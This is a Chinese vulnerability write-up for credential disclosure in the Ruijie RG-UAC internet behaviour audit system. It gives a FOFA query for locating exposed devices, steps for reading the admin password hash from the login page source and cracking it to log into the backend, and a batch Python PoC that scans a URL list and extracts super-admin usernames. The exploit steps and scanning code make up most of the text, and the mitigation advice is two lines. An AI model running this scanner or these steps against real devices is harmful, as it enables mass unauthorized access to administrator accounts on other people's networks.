0x01漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台
0x02 影响
锐捷RG-UAC统一上网行为管理审计系统
0x03漏洞复现
使用FOFA语句
title="RG-UAC登录页面" && body="admin"
直接F12 搜索关键字 admin
使用 md5解密 password字段
使用用户名和刚刚破解的密码,即可登录后台系统
0x04 安全建议
1、及时关注官方补丁
2、建议避免将该设备暴露于互联网
批量验证POC
# author: Zeo
# python: 3.7
# datetime:2021/3/8 4:48 下午
# software: PyCharm
"""
文件说明:锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露
"""
import requests
import sys
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
title='''
--------------------------------------------
锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露
使用格式: python3 url.txt
--------------------------------------------
'''
def Scan(file_name):
with open(file_name, "r", encoding='utf8') as urls:
for url in urls:
if url[:4] != "http":
url = "http://" + url
url = url.strip('\n')
try:
exp(url)
except Exception as e:
continue
def exp(target_url):
vuln_url = target_url
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
print("目标 {}存在漏洞 密码md5自行查询破解".format(target_url) )
usernames = re.findall('"auth_method":"1","role":"super_admin","name":"(.*?)","lastpwdtime":',response.text)
for username in usernames:
print(username)
response.text
else:
print("目标 {}不存在漏洞".format(target_url))
except Exception as e:
print("目标 {}不存在漏洞".format(target_url))
if __name__ == '__main__':
print(title+ '\n')
file_name = sys.argv[1]
if file_name:
Scan(file_name)
else:
exit()